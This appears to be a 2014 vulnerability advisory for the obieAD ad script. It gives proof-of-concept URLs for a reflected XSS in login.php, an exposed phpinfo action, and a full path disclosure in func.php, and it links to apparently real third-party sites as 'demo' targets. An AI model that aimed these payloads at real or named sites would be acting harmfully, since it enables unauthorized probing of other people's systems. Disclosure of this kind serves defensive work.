facebook facebook twitter rss

obieAD <=1.1 (XSS/ID/FPD) Multiple Vulnerabilities

Author: Cold z3ro , Published: 14-12-2014
obieAD <=1.1 (XSS/ID/FPD) Multiple Vulnerabilities

By Cold z3ro, www.hackteach.org | https://www.facebook.com/groups/hackteach.org/
vendor : obiewebsite.sourceforge.net/obie.php

XSS:
Error found in login.php file with $PHP_SELF its make an xss vuln
download :
http://www.scripts.com/viewscript/obiead/2280/
line 183
<FORM action="<?=$PHP_SELF;?>" method="post">
--------------------
http://localhost/obiead/login.php/%22%3E%3Cscript%3Ealert%28%27hello%27%29;%3C/script%3E

===================
Information Disclosure
Bug found in func.php file
line 146
if ($action=='phpinfo'){
phpinfo();
}

http://localhost/obiead/func.php?action=phpinfo
demo
http://www.sarbn.ru/top1/func.php?action=phpinfo

===================
Full Path Disclosure
Bug found in func.php file , which the variable $file in source return array which lead to error and disclose the full path
line 141
if ($action=='chmodf' && $file){
chmod ($file, 0744);
print("<script>alert('CHMOD file \"$file\" successfully');</script>");
}
http://localhost/obiead/func.php?action=chmodf
demo
http://www.mebelmaster.bos.ru/obiead/func.php?action=chmodf

Like us on Facebook :